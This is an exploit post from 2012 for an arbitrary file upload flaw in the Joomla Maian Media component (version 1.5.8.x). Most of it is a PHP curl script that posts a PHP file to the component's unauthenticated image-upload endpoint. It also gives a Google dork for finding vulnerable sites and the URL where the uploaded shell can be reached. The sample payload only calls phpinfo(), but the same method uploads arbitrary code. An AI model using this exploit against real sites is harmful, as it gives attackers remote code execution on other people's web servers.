Joomla Maian Media Exploit .

1. #megafab.net
2.  
3.  
4. //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
5.  
6.  
7.  
8.  
9.  
10.  
11.  
12.  
13. Joomla Maian Media 1.5.8.x Shell Upload
14.  
15. \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
16. # Description : Joomla Components - Maian Media Arbitrary File Upload
17. Vulnerability
18. # Version : 1.5.8.x
19. # Link :
20. http://www.aretimes.com/index.php?option=com_rokdownloads&view=folder&Itemid=67
21. # Plugins :
22. http://www.aretimes.com/are-software/maian-media/9-full-package/download.html
23. # Date : 14-06-2012
24. # Google Dork : inurl:/components/com_maianmedia/
25. # Site : cyberz0ne.net #TheNewMilw0rm
26. # Author : MrFab a.k.a M3GAFAB
27. http://www.megafab.net/
28. /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
29.  
30. Exploit :
31.  
32. PostShell.php
33. <?php
34.  
35. $headers = array("Content-Type: application/octet-stream");
36. $uploadfile="<?php phpinfo(); ?>";
37. $ch =
38. curl_init("http://www.example.com/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php");
39. curl_setopt($ch, CURLOPT_POST, true);
40. curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"$uploadfile"));
41. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
42. curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
43. $postResult = curl_exec($ch);
44. curl_close($ch);
45. print "$postResult";
46.  
47. ?>
48.  
49. Shell Access :
50. http://www.exemple.com/administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/lo.php
51.  
52. lo.php
53. <?php
54. phpinfo();
55. ?